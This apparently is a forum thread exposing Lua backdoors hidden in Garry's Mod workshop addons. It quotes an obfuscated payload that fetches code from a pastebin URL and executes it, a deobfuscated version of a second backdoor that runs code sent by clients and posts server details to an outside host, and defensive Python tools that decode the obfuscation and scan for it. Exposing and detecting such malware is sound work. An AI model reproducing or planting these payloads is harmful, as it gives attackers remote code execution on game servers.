Backdoored workshop addon (Drugs Mod)

Drugs Mod

^ BACKDOORED ^

autorun/server/drugz_resource.lua
Line 46: _GP = table.Copy(_G);
Line 91: include("…/models/drug_mod/default_base.dx90.vtx")

WTF?

Viewing the file…

File starts with "--[[" (Lua block comment)
In the middle of the file, the comment ends and contains this code:
[lua]
_GP["timer"]["Simple"](10,function()_GP["ht".."tp"]["Fe".."tch"]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x6a\x61\x51\x30\x50\x48\x56\x4d",function(c) Payload = _GP["C".."om".."pile".."Str".."ing"](c or "--", '[C]', false) Payload() end) end) GPVERSION = "DurgzMod"
[/lua]
Links to here: https://pastebin.com/raw/jaQ0PHVM

… And it’s missing the “dextro” model.

Get this shit off workshop thanks
also lol at the ironic picture.
Note: the original durgz mod did not contain this backdoor.

… Found it by comparing the durgz mods available to find the one with all the content.

Seems like this one is the good one: https://steamcommunity.com/workshop/filedetails/?id=696374067

It is uploaded by a known cheater / exploiter as well.

It’s hosted on a DigitalOcean droplet. Someone feel free to report abuse to have it taken down: https://www.digitalocean.com/company/contact/

What does that backdoor script actually do? I’m having a hard time following it (never programmed in Lua, which may be why).

As far as I understand it’s got 3 Steam IDs hardcoded so the script will only run for accounts with those IDs (doesn’t look like a blacklist, i.e. DON’T run for these IDs), but then it’s got code for logging the player’s server rcon password (and normal password) and some form of anti-cheat detection (assuming anti-Lua-script anti-cheat protection).

…but then it has code for sending Lua information, steamID, unique ID (?) and account Nickname for some reason regardless of whether it’s been defined up top or not.

Is it just going after certain players so it can steal server info or is it going after everyone APART from those SteamIDs and what’s it doing with the args code at the bottom (assuming it’s some form of basic botnet-style takeover code)?

Found another one:

autorun/alien.lua contains:

[lua]
08\82\101\99\101\105\118\101" local mt = {0, 6, 10, 21, 34, 38, 54, 57, 66, 69, 75, 80, 86, 90, 94, 115, 130, 138, 140, 146, 152, 162, 172, 176, 182} local l = (function(n) return ms:sub(mt[n] + 1, mt[n + 1]) end) local g = (function(n) return _G[l(n)] end) if g(1) and g(2)l(3) then local f = (function() end) local c = g(4) local r = g(7)[l(22)] g(5)l(6) g(7)[l(8)][l(21)] = (function() local s = c(r() or "--", l(9), false) if g(23)(s) ~= l(10) then g(24)(s, f) end end) g(11)[l(12)](16, function() g(13)[l(14)](l(15), {hn = g(16)(l(17)), ip = g(16)(l(18)), np = #g(19)l(20)}, f, f) end) end
[/lua]

The models in this one are fine though.

(roleplaying backdoor investigator)

Unobfuscated:
[lua]
if SERVER and game.IsDedicated() then
    local noop = function() end
    -- util.AddNetworkString, not net.AddNetworkString: the offset table in the
    -- obfuscated listing leaves a four-character name here, and net has no such function
    util.AddNetworkString("m9k_addons")
    -- any connected client that sends this net message gets a string compiled and run on the server
    net.Receivers["m9k_addons"] = function()
        local s = CompileString(net.ReadString() or "--", "[C]", false)
        -- with HandleError = false, CompileString returns the error text as a string on failure
        if type(s) ~= "string" then
            xpcall(s, noop) -- runtime errors are swallowed by the noop handler
        end
    end
    -- 16 seconds after load, report the server to the operator's host
    timer.Simple(16, function()
        http.Post("http://gmod.hints.me", {
            hn = GetConVarString("hostname"),
            ip = GetConVarString("ip"),
            np = #player.GetAll()
        }, noop, noop)
    end)
end
[/lua]
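The obfuscated alien.lua snippet hides every name in one string plus an offset table (mt), and the unobfuscated listing above is the result of slicing that string by hand. The following is an added example, not code from the thread or from the addon, that shows how the scheme works and cross-checks the listing against the quoted offsets: it packs a constructed list of names the same way the obfuscator must have, confirms the resulting offsets equal mt, and rewrites g(n)/l(n) expressions back into readable Lua. Two entries are assumptions: slot 5 is taken as "util" (the offsets leave four characters there, and AddNetworkString is a util function), and slot 15 as "http://gmod.hints.me/", a 21-character form of the URL in the listing.

```python
import re
from typing import List, Tuple

# The offset table quoted in the thread's alien.lua snippet. In the Lua, names are
# recovered as ms:sub(mt[n] + 1, mt[n + 1]) with 1-based, inclusive indices.
MT = [0, 6, 10, 21, 34, 38, 54, 57, 66, 69, 75, 80, 86, 90, 94, 115, 130,
      138, 140, 146, 152, 162, 172, 176, 182]

# Constructed: the names the unobfuscated listing reveals, in the order the
# obfuscated code indexes them. Assumptions checked against MT below: slot 5 is
# a four-character global ("util", which carries AddNetworkString) and slot 15
# is 21 characters, which "http://gmod.hints.me/" satisfies.
NAMES = ["SERVER", "game", "IsDedicated", "CompileString", "util",
         "AddNetworkString", "net", "Receivers", "[C]", "string", "timer",
         "Simple", "http", "Post", "http://gmod.hints.me/", "GetConVarString",
         "hostname", "ip", "player", "GetAll", "m9k_addons", "ReadString",
         "type", "xpcall"]


def lua_l(ms: str, mt: List[int], n: int) -> str:
    """Python twin of the snippet's l(n): Lua's mt[n] is Python's mt[n-1],
    and a 1-based inclusive sub(a, b) is the 0-based slice [a-1:b]."""
    return ms[mt[n - 1]:mt[n]]


def split_by_offsets(ms: str, mt: List[int]) -> List[str]:
    """Recover every name the offset table can address, in order."""
    return [lua_l(ms, mt, n) for n in range(1, len(mt))]


def pack(names: List[str]) -> Tuple[str, List[int]]:
    """Build (ms, mt) the way the obfuscator had to: concatenate the names and
    record the cumulative length after each one."""
    ms, mt = "", [0]
    for name in names:
        ms += name
        mt.append(len(ms))
    return ms, mt


def deobfuscate(expr: str, names: List[str]) -> str:
    """Rewrite g(n) as the global it resolves to and l(n) as a string literal."""
    expr = re.sub(r'\bg\((\d+)\)', lambda m: names[int(m.group(1)) - 1], expr)
    return re.sub(r'\bl\((\d+)\)',
                  lambda m: '"%s"' % names[int(m.group(1)) - 1], expr)


if __name__ == "__main__":
    ms, mt = pack(NAMES)
    print("offsets match the quoted mt:", mt == MT)
    for n, name in enumerate(split_by_offsets(ms, MT), start=1):
        print(n, name)
    print(deobfuscate('g(7)[l(8)][l(21)] = g(4)(r() or "--", l(9), false)', NAMES))
```

If any name in the list had the wrong length, the cumulative offsets would drift from that slot onward and the comparison with mt would fail; that is what makes the offset table a useful cross-check when verifying someone else's deobfuscation (it is how the util/net mix-up in slot 5 shows up).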

Previously Infected Addons (all are removed):

This backdoor was birthed from a workshop addon that was taken down a couple of years ago. People re-uploaded that addon with the backdoor still inside. The original addon which it came from is unknown; however, recent findings have led us to believe that people are accidentally uploading the backdoor without knowing about it, to their own workshop models. We have had a conversation with one of the authors who uploaded this backdoor (ID: 1080401866) and he informed us that he was simply following a tutorial and copied the Lua file from a GameBanana model. We have yet to find the GameBanana model that the author of the model claimed to have downloaded; however, he did send us a mediafire link containing the download. We have logged a total of 7 addons with the same backdoor, excluding this report. For the past couple of months, we have been scanning every new addon uploaded to the workshop and have had major success ridding the workshop of backdoors during this time frame. I’m not entirely sure how this addon is being flagged now, yet wasn’t flagged during our initial scanning. Nonetheless, we are developing a new technology to analyze workshop addons and will come back with our findings soon.

(probably won’t come back, will just email rubat) … (end scene)

Stop lying, the addon clearly says no backdoors in the thumbnail…

Why do these retards always use the exact same fucking backdoor?

I think you mean “Why do they keep uploading addons with a (known) backdoor or a backdoor at all?”

Sadly I’m one of the people who re-uploaded a plugin they had but couldn’t find on the workshop.

And frankly, Steam support is not the most helpful and they will prob not unban the item or me and they will prob not let me update it either but I’d have to recreate it.

Not to mention I got comments making it look like I intentionally placed the backdoor.

LMAO, why would you upload something that you didn’t make, it’s the first workshop rule iirc

Afaik it’s not… if it were, the workshop would have 500,000 fewer items.

//EDIT: The item has also been 2 years on the workshop and honestly I forgot about it.

Read the damn rules, just because someone else wants to be a dick, it’s not a reason why you should be one
If the rules say “Do not reupload addons - Reuploaded addons will be taken down. Search workshop before uploading. Reuploading workshop addons is strictly forbidden, whatever the reupload reason is. (Even if the original workshop addon was removed)” then don’t fucking upload content you didn’t make, simple as that

If it’s been 2 years without anybody moderating it, IT’S NOT A REASON TO KEEP IT. It has backdoors because you had no idea of the source or the knowledge to remove the backdoor; stop being stubborn and take your ban like a man

Lol I love how you think I don’t take the ban.

What position are you trying to defend here? By reuploading someone else’s shit you get the credit for it, but when it turns out it has a backdoor you wash your hands?

You uploaded an addon with a backdoor. You’re responsible for that. The fact that you didn’t make it doesn’t make it better for you. It merely means that you broke not one rule, but two. The breaking of one rule does not negate the other.

Its. Almost. As. If. We. Should. Have. The. Ability. To. Disable. Lua. Execution. On. Workshop. Addons.

I personally loop through all workshop addons and check out their Lua code, but I mean it’s so simple to have something common and upload an “update” with a nice backdoor in it. It really would be cool to have the ability to disable Lua execution on certain workshop addons via a Lua function or something.
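Looping over addon Lua and eyeballing it misses exactly the tricks this thread shows, because they exist to defeat a grep: the URL is a run of \x escapes, function names are glued together with "..", and tbl["name"] replaces tbl.name. The following is an added example, not code from any poster or from the addons discussed, of a small checker that undoes those three layers before pattern matching and then flags the combination that matters (compiling text that came off the network). It assumes the addon's .lua files have already been extracted to plain text; the indicator list is a heuristic, and the sample inputs are constructed for this example (the first one is the snippet quoted in the first post with ASCII quotes restored, the second is modelled on the net.Receivers variant, the third is harmless addon code that must not trip it).

```python
import re
from typing import List, Tuple

# Lua string escapes: \xHH (hex byte) and \ddd (decimal byte, up to three digits).
_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})|\\(\d{1,3})')
# Two plain literals glued with Lua's ".." operator, e.g. "ht".."tp".
_CONCAT = re.compile(r'(["\'])([^"\']*)\1\s*\.\.\s*(["\'])([^"\']*)\3')
# tbl["name"] written to dodge a grep for tbl.name.
_INDEX = re.compile(r'\[(["\'])([A-Za-z_]\w*)\1\]')

# Indicators evaluated on the normalised source: the tricks seen in the thread,
# i.e. copying _G, compiling fetched or received text, and calling home.
INDICATORS = [
    ("global_table_copy", re.compile(r'table\.Copy\s*\(\s*_G\s*\)')),
    ("dynamic_code", re.compile(r'\b(CompileString|RunString|RunStringEx)\b')),
    ("remote_fetch", re.compile(r'\bhttp\.(Fetch|Post)\b')),
    ("net_receiver_hook", re.compile(r'\bnet\.Receivers\b')),
    ("url_literal", re.compile(r'["\'](https?://[^"\']+)["\']')),
]


def decode_lua_escapes(text: str) -> str:
    """Expand \\xHH and \\ddd escapes so hidden strings become readable."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2)) % 256)
    return _ESC.sub(repl, text)


def join_fragments(src: str) -> str:
    """Collapse "C".."om".."pile" style chains into one literal, repeating until stable."""
    prev = None
    while prev != src:
        prev = src
        src = _CONCAT.sub(lambda m: '"' + m.group(2) + m.group(4) + '"', src)
    return src


def normalise(src: str) -> str:
    """Undo the three cheap obfuscation layers before pattern matching."""
    src = decode_lua_escapes(src)
    src = join_fragments(src)
    return _INDEX.sub(r'.\2', src)


def scan_lua(src: str) -> List[Tuple[str, str]]:
    """Return (indicator, evidence) pairs found in one Lua source string."""
    text = normalise(src)
    findings = []
    for name, pattern in INDICATORS:
        for m in pattern.finditer(text):
            findings.append((name, m.group(m.lastindex) if m.lastindex else m.group(0)))
    return findings


def is_suspicious(src: str) -> bool:
    """Flag code that compiles text it obtained over HTTP or from a net message."""
    kinds = {k for k, _ in scan_lua(src)}
    return "dynamic_code" in kinds and bool(kinds & {"remote_fetch", "net_receiver_hook"})


# Constructed samples (see lead-in); only the first is verbatim from the thread.
SAMPLE_DRUGZ = (
    r'_GP["timer"]["Simple"](10,function()_GP["ht".."tp"]["Fe".."tch"]('
    r'"\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e'
    r'\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x6a\x61\x51\x30\x50\x48\x56\x4d",'
    r'function(c) Payload = _GP["C".."om".."pile".."Str".."ing"]'
    r'(c or "--", "[C]", false) Payload() end) end)'
)
SAMPLE_NET = (
    r'net.Receivers["m9k_addons"] = function() local s = CompileString('
    r'net.ReadString() or "--", "[C]", false) if type(s) ~= "string" then '
    r'xpcall(s, noop) end end'
)
SAMPLE_BENIGN = r'local cfg = util.JSONToTable(file.Read("drugs_cfg.txt", "DATA") or "{}")'

if __name__ == "__main__":
    for label, sample in (("drugz", SAMPLE_DRUGZ), ("net", SAMPLE_NET), ("benign", SAMPLE_BENIGN)):
        print(label, is_suspicious(sample), scan_lua(sample))
```

Run it over every file under an addon's lua/ directory and review anything is_suspicious() returns; the findings list also surfaces the decoded URL (here the pastebin raw link from the first post) so the callback host can be looked at without executing anything. A remote_fetch hit on its own is common in legitimate addons; the combination with dynamic_code is the signal.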

Or just extract the addons if you are so concerned.